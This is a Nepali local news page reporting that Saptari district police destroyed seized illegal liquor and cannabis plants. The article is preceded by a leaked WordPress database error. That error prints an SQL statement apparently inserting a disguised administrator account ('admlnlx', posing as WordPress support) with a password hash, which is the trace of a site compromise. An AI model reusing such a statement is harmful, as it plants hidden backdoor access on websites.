WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/UZn2B0Pt1a6gq3U3D.QwXQSpN4Sd1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-01 21:02:41', '', 'admlnlx', 'admlnlx')
राजविराज, माघ १२ –
जिल्लाको विभिन्न ठाउँबाट खोजतलास गर्ने क्रममा फेला पारेको उक्त अवैध घरेलु मदिरा नष्ट गरिएको जिल्ला प्रहरी कार्यालय सप्तरीले जनाएको छ । बरामद गरिएको मदिरा जिल्लाको बकधुवा–९ महुली खोलामा स्थानीय मानिसको रोहबरमा नष्ट गरेको प्रहरीले जनाएको छ ।
यस्तै इलाका प्रहरी कार्यालय कल्याणपुर र रुपनीबाट खटिएको प्रहरी टोलीले करिब गाजाको सय बोट नष्ट गरेको छ । जिल्लाको नेगडा गाविस वडा नं ४, ५, ६ र शम्भुनाथ नगरपालिका ३ र ४ का स्थानीयले आफ्नो घर करेसाबारीमा लगाएको उक्त गाँजाका बोट नष्ट गरेको प्रहरीले जनाएको छ ।